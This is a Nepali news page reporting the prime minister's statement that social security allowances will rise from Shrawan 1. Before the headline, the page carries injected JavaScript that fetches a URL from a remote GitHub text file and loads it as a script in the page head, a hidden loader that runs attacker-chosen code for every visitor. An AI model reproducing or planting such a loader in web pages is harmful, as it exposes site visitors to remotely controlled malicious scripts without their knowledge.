;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); साउन १ गतेदेखि सामाजिक सुरक्षा भत्ता बढाउने : प्रधानमन्त्री – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • साउन १ गतेदेखि सामाजिक सुरक्षा भत्ता बढाउने : प्रधानमन्त्री
जुनेली बिशेष

साउन १ गतेदेखि सामाजिक सुरक्षा भत्ता बढाउने : प्रधानमन्त्री

चैत १७,

काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीले आगामी साउन १ गतेदेखि सामाजिक सुरक्षा भत्ता वृद्धि हुने बताएका छन्।

रिपोर्टस क्लबको वार्षिकोउत्सव कार्यक्रममा उनले भने, ‘हामी साउन १ गतेदेखि वृद्धभत्तालगायत सामाजिक सुरक्षा भत्ता बढाउँछौँ। यो सुन्दा मान्छेहरूलाई अर्को छटपटी भयो होला।’

उनले आफूले देश विकासको लहर ल्याएकाले हटाउन खोजेको आरोप लगाए। ‘देश संकटमा पर्‍याे रे? कहाँ पर्‍याे देश संकटमा? कहाँ पर्यो संघीयतामाथि संकट?’ उनले भने।

नेपाललाई समृद्ध बनाउने अभियानमा आफूहरु लागिरहेको बताए।

फेसबुक प्रतिक्रियाहरु